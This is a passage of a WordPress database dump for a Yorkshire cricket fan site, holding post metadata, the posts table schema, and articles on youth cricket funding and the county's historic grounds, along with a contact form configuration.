e\";s:10:\"image/jpeg\";}s:22:\"the-minimal-image-full\";a:4:{s:4:\"file\";s:27:\"cricket-honours-926x498.jpg\";s:5:\"width\";i:926;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"the-minimal-image\";a:4:{s:4:\"file\";s:27:\"cricket-honours-750x400.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 40D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"400\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51,16,'_thumbnail_id','17'),(54,16,'_yoast_wpseo_content_score','60'),(55,18,'fw_options','a:0:{}'),(56,16,'_yoast_wpseo_primary_category','5'),(57,19,'fw_options','a:0:{}'),(60,20,'fw_options','a:0:{}'),(63,21,'fw_options','a:0:{}'),(66,22,'fw_options','a:0:{}'),(69,23,'fw_options','a:0:{}'),(72,24,'fw_options','a:0:{}'),(73,25,'_menu_item_type','custom'),(74,25,'_menu_item_menu_item_parent','0'),(75,25,'_menu_item_object_id','25'),(76,25,'_menu_item_object','custom'),(77,25,'_menu_item_target',''),(78,25,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(79,25,'_menu_item_xfn',''),(80,25,'_menu_item_url','https://yorkshirecricketboard.org.uk'),(81,26,'_menu_item_type','post_type'),(82,26,'_menu_item_menu_item_parent','0'),(83,26,'_menu_item_object_id','2'),(84,26,'_menu_item_object','page'),(85,26,'_menu_item_target',''),(86,26,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(87,26,'_menu_item_xfn',''),(88,26,'_menu_item_url',''),(89,27,'_menu_item_type','post_type'),(90,27,'_menu_item_menu_item_parent','0'),(91,27,'_menu_item_object_id','16'),(92,27,'_menu_item_object','post'),(93,27,'_menu_item_target',''),(94,27,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(95,27,'_menu_item_xfn',''),(96,27,'_menu_item_url',''),(97,28,'_menu_item_type','post_type'),(98,28,'_menu_item_menu_item_parent','27'),(99,28,'_menu_item_object_id','13'),(100,28,'_menu_item_object','post'),(101,28,'_menu_item_target',''),(102,28,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(103,28,'_menu_item_xfn',''),(104,28,'_menu_item_url',''),(105,29,'_menu_item_type','post_type'),(106,29,'_menu_item_menu_item_parent','27'),(107,29,'_menu_item_object_id','10'),(108,29,'_menu_item_object','post'),(109,29,'_menu_item_target',''),(110,29,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(111,29,'_menu_item_xfn',''),(112,29,'_menu_item_url',''),(113,30,'_menu_item_type','post_type'),(114,30,'_menu_item_menu_item_parent','0'),(115,30,'_menu_item_object_id','1'),(116,30,'_menu_item_object','post'),(117,30,'_menu_item_target',''),(118,30,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(119,30,'_menu_item_xfn',''),(120,30,'_menu_item_url',''),(121,32,'_edit_last','1'),(122,32,'the_minimal_sidebar_layout','right-sidebar'),(123,32,'_yoast_wpseo_content_score','60'),(124,33,'fw_options','a:0:{}'),(125,32,'_edit_lock','1507025946:1'),(126,34,'fw_options','a:0:{}'),(127,35,'fw_options','a:0:{}'),(128,36,'fw_options','a:0:{}'),(129,37,'fw_options','a:0:{}'),(130,38,'fw_options','a:0:{}'),(131,39,'fw_options','a:0:{}'),(132,40,'fw_options','a:0:{}'),(133,41,'fw_options','a:0:{}'),(134,42,'fw_options','a:0:{}'),(135,43,'_wp_attached_file','2017/07/team-of-cricketers.jpg'),(136,43,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:372;s:4:\"file\";s:30:\"2017/07/team-of-cricketers.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"team-of-cricketers-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"team-of-cricketers-300x116.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"team-of-cricketers-768x298.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-post-thumb\";a:4:{s:4:\"file\";s:28:\"team-of-cricketers-60x60.jpg\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"the-minimal-feature-thumb\";a:4:{s:4:\"file\";s:30:\"team-of-cricketers-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"the-minimal-slider-thumb\";a:4:{s:4:\"file\";s:28:\"team-of-cricketers-63x46.jpg\";s:5:\"width\";i:63;s:6:\"height\";i:46;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"the-minimal-image\";a:4:{s:4:\"file\";s:30:\"team-of-cricketers-750x372.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:372;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(137,44,'fw_options','a:0:{}'),(138,45,'fw_options','a:0:{}'),(139,46,'fw_options','a:0:{}'),(140,47,'fw_options','a:0:{}'),(141,48,'_menu_item_type','post_type'),(142,48,'_menu_item_menu_item_parent','30'),(143,48,'_menu_item_object_id','32'),(144,48,'_menu_item_object','page'),(145,48,'_menu_item_target',''),(146,48,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(147,48,'_menu_item_xfn',''),(148,48,'_menu_item_url',''),(150,25,'_dw_megamenu_type','column'),(151,25,'_dw_megamenu_sicon',''),(152,27,'_dw_megamenu_type','column'),(153,27,'_dw_megamenu_sicon',''),(154,28,'_dw_megamenu_type','column'),(155,28,'_dw_megamenu_sicon',''),(156,30,'_dw_megamenu_type','column'),(157,30,'_dw_megamenu_sicon',''),(158,48,'_dw_megamenu_type','column'),(159,48,'_dw_megamenu_sicon',''),(160,26,'_dw_megamenu_type','column'),(161,26,'_dw_megamenu_sicon',''),(162,29,'_dw_megamenu_type','column'),(163,29,'_dw_megamenu_sicon',''),(164,49,'fw_options','a:0:{}'),(165,50,'fw_options','a:0:{}'),(166,51,'fw_options','a:0:{}'),(167,52,'fw_options','a:0:{}'),(168,53,'fw_options','a:0:{}'),(169,54,'fw_options','a:0:{}'),(170,55,'fw_options','a:0:{}'),(171,56,'fw_options','a:0:{}'),(172,57,'fw_options','a:0:{}'),(173,58,'fw_options','a:0:{}'),(174,59,'fw_options','a:0:{}'),(175,60,'fw_options','a:0:{}'),(176,61,'fw_options','a:0:{}'),(177,62,'fw_options','a:0:{}'),(178,63,'fw_options','a:0:{}'),(179,64,'fw_options','a:0:{}'),(180,65,'fw_options','a:0:{}'),(181,66,'fw_options','a:0:{}'),(182,67,'fw_options','a:0:{}'),(183,68,'fw_options','a:0:{}'),(184,70,'_edit_last','1'),(185,71,'the_minimal_sidebar_layout','right-sidebar'),(186,71,'_menu_item_type','post_type'),(187,71,'_menu_item_menu_item_parent','30'),(188,71,'_menu_item_object_id','70'),(189,71,'_menu_item_object','page'),(190,71,'_menu_item_target',''),(191,71,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(192,71,'_menu_item_xfn',''),(193,71,'_menu_item_url',''),(194,70,'the_minimal_sidebar_layout','right-sidebar'),(195,70,'_yoast_wpseo_content_score','30'),(196,72,'fw_options','a:0:{}'),(197,70,'_edit_lock','1507025829:1'),(198,71,'_dw_megamenu_type','column'),(199,71,'_dw_megamenu_sicon',''),(200,73,'fw_options','a:0:{}'),(201,74,'fw_options','a:0:{}'),(202,76,'_edit_last','1'),(203,76,'_edit_lock','1549963254:1'),(204,77,'the_minimal_sidebar_layout','right-sidebar'),(205,77,'_menu_item_type','post_type'),(206,77,'_menu_item_menu_item_parent','0'),(207,77,'_menu_item_object_id','76'),(208,77,'_menu_item_object','page'),(209,77,'_menu_item_target',''),(210,77,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(211,77,'_menu_item_xfn',''),(212,77,'_menu_item_url',''),(213,76,'the_minimal_sidebar_layout','right-sidebar'),(214,76,'_yoast_wpseo_content_score','60'),(215,78,'fw_options','a:0:{}'),(216,79,'_wp_attached_file','2019/02/airsoft-guns.jpg'),(217,79,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:24:\"2019/02/airsoft-guns.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"airsoft-guns-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"airsoft-guns-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"airsoft-guns-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-post-thumb\";a:4:{s:4:\"file\";s:22:\"airsoft-guns-60x60.jpg\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"the-minimal-feature-thumb\";a:4:{s:4:\"file\";s:24:\"airsoft-guns-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"the-minimal-slider\";a:4:{s:4:\"file\";s:24:\"airsoft-guns-960x500.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"the-minimal-slider-thumb\";a:4:{s:4:\"file\";s:22:\"airsoft-guns-63x46.jpg\";s:5:\"width\";i:63;s:6:\"height\";i:46;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-image-full\";a:4:{s:4:\"file\";s:24:\"airsoft-guns-960x498.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"the-minimal-image\";a:4:{s:4:\"file\";s:24:\"airsoft-guns-750x400.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCA-77M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(218,79,'_wp_attachment_image_alt','Airsoft is one of the biggest hobbies around the world'),(219,76,'_thumbnail_id','79'),(220,80,'_wp_attached_file','2019/02/playing-airsoft.jpg'),(221,80,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:27:\"2019/02/playing-airsoft.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"playing-airsoft-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"playing-airsoft-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"playing-airsoft-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-post-thumb\";a:4:{s:4:\"file\";s:25:\"playing-airsoft-60x60.jpg\";s:5:\"width\";i:60;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"the-minimal-feature-thumb\";a:4:{s:4:\"file\";s:27:\"playing-airsoft-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"the-minimal-slider\";a:4:{s:4:\"file\";s:27:\"playing-airsoft-960x500.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"the-minimal-slider-thumb\";a:4:{s:4:\"file\";s:25:\"playing-airsoft-63x46.jpg\";s:5:\"width\";i:63;s:6:\"height\";i:46;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:22:\"the-minimal-image-full\";a:4:{s:4:\"file\";s:27:\"playing-airsoft-960x498.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"the-minimal-image\";a:4:{s:4:\"file\";s:27:\"playing-airsoft-750x400.jpg\";s:5:\"width\";i:750;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCA-77M2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(222,80,'_wp_attachment_image_alt','Buy all of your airsoft gear at Socom Tactical UK'),(223,81,'fw_options','a:0:{}'),(224,77,'_dw_megamenu_type','column'),(225,77,'_dw_megamenu_sicon','');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=87 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES (1,1,'2016-12-15 14:59:27','2016-12-15 14:59:27','Declining income is a problem throughout the game, not just in Yorkshire.\r\n\r\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\n\r\nWe have also decided to sell our own branded merchandise, a fantastic idea that was produced by an associated supporter.\r\n\r\nThe funds from this will go towards helping to fund <a href=\"https://yorkshireccc.com/teams/category/first-xi-capped\" target=\"_blank\">Yorkshire’s Cricketer team</a> as much as we can. Our list consists of scarves, hats, and even drinks labels that are sold at the club.\r\n\r\nWe have worked with Wrappz to try and find the best label for the Yorkshire team, and it will be available for you in the early months of 2017. <a href=\"http://www.wrappz.com/cat/personalised-bottle-labels-wine-beer\" target=\"_blank\">Find out more</a>.\r\n\r\n<strong>Yorkshire has supported moves to extend the interest in cricket.</strong>\r\n<h2><strong>Youth Cricket</strong></h2>\r\nThere is a wider choice in sport and leisure opportunities than in the days of <a href=\"http://www.espncricinfo.com/england/content/player/14101.html\" target=\"_blank\">Lord Hawke</a>.\r\n\r\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\r\n\r\n<a href=\"https://yorkshireccc.com/cricketcentre\" target=\"_blank\">Yorkshire Cricket Centre</a> at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\r\n<h3><strong>Schools</strong></h3>\r\nMany state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\r\n<h3><strong>Clubs</strong></h3>\r\nWith fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\r\n\r\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\r\n\r\n<strong><a href=\"http://www.telegraph.co.uk/education/educationnews/7741031/Only-a-third-of-schools-offer-cricket.html\" target=\"_blank\">Read more</a>: Only a third of schools offer cricket as a sport</strong>\r\n<h3><strong>The Academy</strong></h3>\r\nYorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley. Watch over the last 150 years of Yorkshire\'s cricket club <a href=\"http://www.thetelegraphandargus.co.uk/tahistory/featuresnostalgiapasttimes/10149205.150_momentous_years_of_Yorkshire_County_Cricket_Club/\" target=\"_blank\">here</a>.','What Does The Future Hold?','','publish','open','open','','what-does-the-future-hold','','','2016-12-16 15:24:11','2016-12-16 15:24:11','',0,'https://yorkshirecricketboard.org.uk/?p=1',0,'post','',0),(2,1,'2016-12-15 14:59:27','2016-12-15 14:59:27','[contact-form-7 id=\"4\" title=\"Contact form 1\"]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2347.1338221423784!2d-1.09132848413815!3d53.964891280113385!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x487931a7555fbe0f%3A0x93c92b3c2f7f94f9!2sBootham%2C+York!5e0!3m2!1sen!2suk!4v1481899661254\" width=\"600\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','Contact Us','','publish','closed','open','','contact-us','','','2016-12-16 14:46:41','2016-12-16 14:46:41','',0,'https://yorkshirecricketboard.org.uk/?page_id=2',0,'page','',0),(4,1,'2016-12-16 08:36:42','2016-12-16 08:36:42','<label> Your Name (required)\r\n    [text* your-name] </label>\r\n\r\n<label> Your Email (required)\r\n    [email* your-email] </label>\r\n\r\n<label> Subject\r\n    [text your-subject] </label>\r\n\r\n<label> Your Message\r\n    [textarea your-message] </label>\r\n\r\n[submit \"Send\"]\nYorkshire Cricket Fans \"[your-subject]\"\n[your-name] <wordpress@yorkshirecricketboard.org.uk>\nFrom: [your-name] <[your-email]>\r\nSubject: [your-subject]\r\n\r\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Yorkshire Cricket Fans (https://yorkshirecricketboard.org.uk)\nleads@vanillacircus.co.uk\nReply-To: [your-email]\n\n\n\n\nYorkshire Cricket Fans \"[your-subject]\"\nYorkshire Cricket Fans <wordpress@yorkshirecricketboard.org.uk>\nMessage Body:\r\n[your-message]\r\n\r\n--\r\nThis e-mail was sent from a contact form on Yorkshire Cricket Fans (https://yorkshirecricketboard.org.uk)\n[your-email]\nReply-To: zoe.allen@vanillacircus.co.uk\n\n\n\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThe date format is incorrect.\nThe date is before the earliest one allowed.\nThe date is after the latest one allowed.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.\nThe number format is invalid.\nThe number is smaller than the minimum allowed.\nThe number is larger than the maximum allowed.\nThe answer to the quiz is incorrect.\nYour entered code is incorrect.\nThe e-mail address entered is invalid.\nThe URL is invalid.\nThe telephone number is invalid.','Contact form 1','','publish','closed','closed','','contact-form-1','','','2016-12-16 14:43:28','2016-12-16 14:43:28','',0,'https://yorkshirecricketboard.org.uk/?post_type=wpcf7_contact_form&#038;p=4',0,'wpcf7_contact_form','',0),(5,1,'2016-12-16 14:45:42','2016-12-16 14:45:42','[contact-form-7 id=\"4\" title=\"Contact form 1\"]','Contact Us','','inherit','closed','closed','','2-autosave-v1','','','2016-12-16 14:45:42','2016-12-16 14:45:42','',2,'https://yorkshirecricketboard.org.uk/2016/12/16/2-autosave-v1/',0,'revision','',0),(6,1,'2016-12-16 14:46:41','2016-12-16 14:46:41','[contact-form-7 id=\"4\" title=\"Contact form 1\"]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2347.1338221423784!2d-1.09132848413815!3d53.964891280113385!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x487931a7555fbe0f%3A0x93c92b3c2f7f94f9!2sBootham%2C+York!5e0!3m2!1sen!2suk!4v1481899661254\" width=\"600\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','Contact Us','','inherit','closed','closed','','2-revision-v1','','','2016-12-16 14:46:41','2016-12-16 14:46:41','',2,'https://yorkshirecricketboard.org.uk/2016/12/16/2-revision-v1/',0,'revision','',0),(7,1,'2016-12-16 15:23:52','2016-12-16 15:23:52','Declining income is a problem throughout the game, not just in Yorkshire.\n\nThe business and marketing side is now almost as important as the playing. Clubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\n\nWe have also decided to sell our own branded merchandise, a fantastic idea that was produced by an associated supporter.\n\nThe funds from this will go towards helping to fund <a href=\"https://yorkshireccc.com/teams/category/first-xi-capped\" target=\"_blank\">Yorkshire’s Cricketer team</a> as much as we can. Our list consists of scarves, hats, and even drinks labels that are sold at the club.\n\nWe have worked with Wrappz to try and find the best label for the Yorkshire team, and it will be available for you in the early months of 2017. <a href=\"http://www.wrappz.com/cat/personalised-bottle-labels-wine-beer\" target=\"_blank\">Find out more</a>.\n\n<strong>Yorkshire has supported moves to extend the interest in cricket.</strong>\n<h2><strong>Youth Cricket</strong></h2>\nThere is a wider choice in sport and leisure opportunities than in the days of <a href=\"http://www.espncricinfo.com/england/content/player/14101.html\" target=\"_blank\">Lord Hawke</a>.\n\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\n\n<a href=\"https://yorkshireccc.com/cricketcentre\" target=\"_blank\">Yorkshire Cricket Centre</a> at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\n<h3><strong>Schools</strong></h3>\nMany state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\n<h3><strong>Clubs</strong></h3>\nWith fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\n\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\n\nRead more: Only a third of schools offe\n<h3><strong>The Academy</strong></h3>\nYorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley. Watch over the last 150 years of Yorkshire\'s cricket club <a href=\"http://www.thetelegraphandargus.co.uk/tahistory/featuresnostalgiapasttimes/10149205.150_momentous_years_of_Yorkshire_County_Cricket_Club/\" target=\"_blank\">here</a>.','What Does The Future Hold?','','inherit','closed','closed','','1-autosave-v1','','','2016-12-16 15:23:52','2016-12-16 15:23:52','',1,'https://yorkshirecricketboard.org.uk/1-autosave-v1',0,'revision','',0),(8,1,'2016-12-16 14:54:55','2016-12-16 14:54:55','Declining income is a problem throughout the game, not just in Yorkshire. The business and marketing side is now almost as important as the playing.\r\nClubs could not survive without the revenue from advertising and sponsorship and the grant from the England and Wales Board.\r\nYorkshire have supported moves to extend the interest in cricket.\r\n\r\n<strong>YOUTH CRICKET</strong>\r\n\r\nThere is a wider choice in sport and leisure opportunities than in the days of Lord Hawke.\r\nWith the advent of summer rugby, with football overlapping summer, computer games, satellite TV and newer school sports such as badminton, squash, golf, athletics and swimming all competing for spare time, cricket is not the automatic choice.\r\nYorkshire Cricket Centre at Headingley is generally fully utilized for evening practices in addition to young people attending cricket courses.\r\n\r\n<strong>Schools.</strong> Many state schools now cannot afford or find the staff for cricket. Yorkshire Schools Cricket Association runs sides from Under-11 up to Under-15 - which are generally regarded as some of the best school sides in the country.\r\n\r\n<strong>Lord\'s Taverners.</strong> In association with the Taverners the County started initiatives in 1992 to develop interest among the under-13 age group by running coaching courses in the schools.\r\nBy using some of the players during the close season, it is hoped that an early introduction will stimulate children all over the County to take up the game.\r\n\r\n<strong>Clubs.</strong> With fewer and fewer schools now playing cricket, the onus is now more on the Clubs to develop young players, and most clubs in Yorkshire now run teams from Under 12-13 to Under 17-18 level.\r\nIt is to the clubs\' advantage to get more young people interested in playing as their own sides are likely to get better. Yorkshire Cricket Association runs Under-16 and Under-19 teams in inter-county competitions, and Yorkshire are usually among the leaders.\r\n\r\n<strong>The Academy.</strong> Yorkshire Cricket Academy was opened in 1988 at Park Avenue ground, Bradford, before moving to the Cricket Centre at Headingley.\r\nIt gathered Yorkshire\'s best young players together during the season to train and play matches as a team. It regularly provides players for 2nd XI games, and some such as Darren Gough and Michael Vaughan graduate to full County contracts and international representative games.\r\n\r\n&nbsp;','What Does The Future Hold?','','inherit','closed','closed','','1-revision-v1','','','2016-12-16 14:54:55','2016-12-16 14:54:55','',1,'https://yorkshirecricketboard.org.uk/1-revision-v1',0,'revision','',0),(9,1,'2016-12-16 14:56:11','2016-12-16 14:56:11','','cricket-player','','inherit','open','closed','','cricket-player','','','2016-12-16 14:56:11','2016-12-16 14:56:11','',1,'https://yorkshirecricketboard.org.uk/wp-content/uploads/2016/12/cricket-player.jpg',0,'attachment','image/jpeg',0),(10,1,'2016-12-16 14:57:44','2016-12-16 14:57:44','<strong>HEADINGLEY, Leeds</strong>\r\n\r\nFirst game 1891 and the County Headquarters since 1893.\r\nHeadingley has played host to Test matches since 1899.\r\n\r\n<strong>BRAMALL LANE, Sheffield</strong>\r\n\r\nFirst game 1863. Last game 1973.\r\nYorkshire\'s first home ground when the Club was founded in 1863 and a prominent venue until 1973, when it became the site for a new stand built by neighbouring Sheffield United FC.\r\nBramall Lane hosted a Test match in 1902.\r\n\r\n<strong>PARK AVENUE, Bradford</strong>\r\n\r\nFirst game 1881.\r\nThe first home of Yorkshire Academy of Cricket. It was one of the County\'s main grounds until in 1985 the pavilion was declared unsafe and had to be demolished. It was, however, given a First Class match in 1992.\r\nPark Avenue was the favourite ground of many players, including Sir Leonard Hutton.\r\n\r\n<strong>HARROGATE</strong>\r\n\r\nFirst game 1894.\r\nA favoured ground. Four Championships have been won there.\r\n\r\n<strong>SCARBOROUGH</strong>\r\n\r\nFirst game 1878.\r\nAlong with Harrogate, this is extremely popular as a festival ground. Each hosted a cricket festival every season - Harrogate early in the season, Scarborough towards the end.\r\n\r\n<strong>Yorkshire also have played matches at Abbeydale, Darnall and Hyde Park all Sheffield), Holbeck and Hunslet (Leeds), 